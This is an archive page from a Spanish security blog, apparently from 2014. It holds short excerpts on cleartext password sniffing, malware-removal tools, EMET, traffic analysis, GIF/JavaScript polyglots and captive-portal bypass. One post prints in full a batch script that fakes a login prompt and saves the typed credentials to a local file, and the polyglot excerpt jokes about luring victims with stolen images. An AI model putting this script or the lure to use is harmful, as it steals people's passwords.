« Entradas por tag: herramientasMostrando 51 a 60, de 112 entrada/s en total:
04 de Diciembre, 2014
□
General |
|
En
este mundillo estamos cansados de repetir que se sustituya FTP y telnet
por sus respectivos equivalente seguros: SCP, FTPS, SFTP, SSH... pero
después de tantos años se siguen utilizando :(
Hoy vamos a hacer una pequeña demostración de la inseguridad del uso de estos protocolos no cifrados capturando tráfico mediante un firewall y obteniendo las contraseñas en claro.
En
la vida real el firewall podría ser la máquina de un atacante, el cuál
tendría la misma facilidad para robar credenciales simplemente esnifando
el tráfico en un nodo que está en medio del camino de nuestra conexión
cliente-servidor. Y no sólo el atacante podría ser una persona hábil que
ha envenenado ARP y ha conseguido hacer un MiTM... en este gran
entramado que es Internet, un ISP o hasta el administrador de red de una
empresa podría estar vigilando..... Continuar leyendo |
|
publicado por
alonsoclaudio a las 19:27 · Sin comentarios
· Recomendar |
|
03 de Diciembre, 2014
□
General |
|
Algo cutre pero muy apañao... y seguro que más de uno se dará un gustazo con el batch... Xd
Se
trata de un script para hacerse un keylogger *muy* básico. Simplemente
crea el directorio c:Logs y luego lanza el fichero Logger.bat con el
siguiente código:
@echo off
color a
title Login
cls
echo Introduce usuario y password para poder ejecutar el programa:
echo.
echo.
cd "C:Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start calc.exe
exit
Enjoy!
Fuente: http://www.latesthackingnews.com/2014/04/09/how-to-create-a-keylogger-in-notepad/
Publicado por
Vicente Motos |
|
publicado por
alonsoclaudio a las 22:34 · Sin comentarios
· Recomendar |
|
02 de Diciembre, 2014
□
General |
|
Cualquiera que realice tareas de test de intrusión/pentesting
(pero el de verdad, no el de lanzar un Nessus y exportar a HTML), sabrá
que uno de los retos más importantes, lejos de conseguir el tan ansiado
administrador de dominio o la enumeración de posibles puntos de entrada y
ataques con los que comprometer la infraestructura interna por completo
(y evitar que te hagan un SONY), es el de gestionar correctamente la información que se obtiene.
Cantidades ingentes de datos, puertos abiertos, servicios vulnerables,
credenciales obtenidas, documentación sensible que sirva de evidencia,
accesos a servidores críticos...podemos dejar una estructura impecable
de directorios, excels y bitácoras o podemos recurrir a herramientas que
nos permitan congregar dicha información. Ya os hemos hablado
anteriormente por aquí de ... Continuar leyendo |
|
publicado por
alonsoclaudio a las 23:17 · Sin comentarios
· Recomendar |
|
02 de Diciembre, 2014
□
General |
|
La mayoría del malware moderno puede desactivar los mecanismos de
seguridad de los sistemas Windows con el fin de ocultarse y protegerse
de ser eliminado por los antivirus que corren en el sistema, esta
característica, hace que el proceso de identificación y eliminación sea
una operación muy complicada y en la mayoría casos, imposible de llevar a
cabo con el sistema operativo arrancado. Lo mejor es arrancar con una
LiveCD, montar el disco del sistema Windows y usar herramientas de
eliminación de malware, todo esto sin el sistema Windows arrancado.

Para estés casos Ubuntu MRT (Ubuntu Malware Removal Toolkit)
una LiveCD basada en Ubuntu centrado en la eliminación de software
malintencionado de Windows, es lo ideal. El propósito de esta
distribución es la creación de un entorno portátil, que hace más fácil
quitar el malware de los sistemas Windows infectados. Permite analizar
rápidamente el disco de un equipo infectado sin tener que arrancar el
sistema... Continuar leyendo |
|
publicado por
alonsoclaudio a las 23:03 · Sin comentarios
· Recomendar |
|
21 de Noviembre, 2014
□
General |
|
Google anunció el pasado martes en su blog Google Online Security
la publicación de una aplicación online (con su código fuente
correspondiente) en la que se recopilaban diferentes pruebas de concepto
relacionadas con vulnerabilidades típicas web, con especial hincapié en
todas las variantes posibles para la ejecución de Cross-Site
Scriptings. Actualmente Google se encuentra desarrollando una
herramienta de auditoría de vulnerabilidades para uso interno (a la que
llaman Inquisition) para la cual necesitaban casos reales de vulnerabilidades para probar su eficacia.
|
|
publicado por
alonsoclaudio a las 18:42 · Sin comentarios
· Recomendar |
|
13 de Noviembre, 2014
□
General |
|

Dentro de los fastos por su décimo aniversario, la gente del ¿zorro? ¿panda rojo?... bueno, la gente de Mozilla ha sacado a la luz el muy anticipado Firefox Developer Edition, una versión de su tradicional navegador enfocado en los desarrolladores. Lo hemos estado probando y la verdad es que las sensaciones son encontradas en esta primera de contacto.
Es siempre agradable que se acuerden de nosotros pero lo cierto es que Firefox Developer Edition no es un "game changer"
(salvo, quizás, que seas un desarrollador de apps para Firefox OS),
aunque seguramente tampoco es que esta fuera la idea inicial de Mozilla.
Lo primero que llama ... Continuar leyendo |
|
publicado por
alonsoclaudio a las 21:27 · Sin comentarios
· Recomendar |
|
11 de Noviembre, 2014
□
General |
|
Microsoft ha lanzado la versión 5.1 de EMET (Enhanced Mitigation Experience Toolkit). Ya sabéis que EMET permite usar técnicas
no implementadas por los desarrolladores de software elevando la
seguridad hasta el máximo permitido Windows. Estas técnicas EMET, o
mitigaciones, bloquean muchos de los métodos utilizados por el software
malicioso y exploits de vulnerabilidades.
Esta nueva versión
corrige varios errores y problemas de compatibilidad con diversas
aplicaciones. Las aplicaciones incluyen Internet Explorer, Adobe Reader,
Adobe Flash y Mozilla Firefox (estos problemas son de esperar con una
herramienta tan "agresiva" como EMET que inicialmente no es parte de
Windows). La nueva versión incluye también configuraciones especiales
para Oracle Java 8 y Google Chrome y añade una función de "Telemetría
Local", que permite al usuario guardar volcados de memoria cuando se
desencadena una mitigación. Tenéis todos los detalles en ... Continuar leyendo |
|
publicado por
alonsoclaudio a las 23:49 · Sin comentarios
· Recomendar |
|
09 de Noviembre, 2014
□
General |
|
Ange Albertini (padre de Angecryption que más adelante veremos) es sin duda un auténtico mago a la hora de crear binarios "políglotas", que son ficheros que tienen simultáneamente varios formatos. Por ejemplo PDF/ZIP/JPG/Audio, PE/PDF/HTML/ZIP, TrueCrypt/PDF/ZIP, etc. Es decir, cada uno de estos ficheros pueden ser abiertos por varias aplicaciones sin error.
Una de las cosas que más nos interesan, dado el mundo de maldad y desenfreno en el que vivimos los hackers"piratas informáticos", es la técnica para abusar de la cabecera de los ficheros GIFs y añadir código Javascript. El resultado un fichero GIF que sea un fichero GIF y JS al mismo tiempo.
Imaginad... basta con publicar anónimamente una copia de una de las
últimas imágenes robadas de alguna famosa y recibiremos miles y miles
de visitas de incautas (pero satisfechas) víctimas, cuyos... Continuar leyendo |
|
publicado por
alonsoclaudio a las 12:53 · Sin comentarios
· Recomendar |
|
04 de Noviembre, 2014
□
General |
|
No es la primera vez que una de las compañías grandes publica una
herramienta que, al parecer lleva utilizando durante mucho tiempo, y que
posteriormente deja a disposición de todo el mundo.
Hoy os hablamos de Moloch, herramienta via web para análisis de tráfico de red (open source), que nos llega por parte del gigante de las telecomunicaciones, AOL.
A grandes rasgos, ¿qué nos aporta frente al conocido por todos Wireshark?
- Se utiliza y gestiona vía web
- Está muy enfocado al análisis forense,
por lo que hay disponibles plugins muy concretos para dichos menesteres
(como por ejemplo, Geolocalización de tramas, reglas de Yara...)
- Facilidad para la búsqueda e indexado de información dentro de las capturas de red
- Posibilidad de crear GUIs propias debido a que hay disponible una API para todo... Continuar leyendo
|
|
publicado por
alonsoclaudio a las 21:22 · Sin comentarios
· Recomendar |
|
01 de Noviembre, 2014
□
General |
|
Hoy en día es muy habitual encontrarse pay-walls o portales cautivos en hotspots públicos, especialmente en sitios como hoteles y aeropuertos.
En esta entrada se mostrará como los WISP implementan estos pay-walls, y cuales suelen ser generalmente sus debilidades.
Si
viajamos con un smartphone o tablet Android es muy fácil saltarse el
portal cautivo desde el mismo dispositivo Android, sin necesidad de
hacer túneles a través de DNS o ICMP. Presentaremos una herramienta que
nos permite automatizar el proceso para saltarnos el pay-wall en "1
click".
En la pasada Rooted
... Continuar leyendo |
|
publicado por
alonsoclaudio a las 15:51 · Sin comentarios
· Recomendar |
|
|
CALENDARIO |
 |
Mayo 2025 |
 |
|
DO | LU | MA | MI | JU | VI | SA | | | | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 |
|
|
| |
AL MARGEN |
Escuela de Educacion Secundaria Tecnica N 8 de Quilmes |
(Técnicos en Informática Personal y Profesional) |
| |
|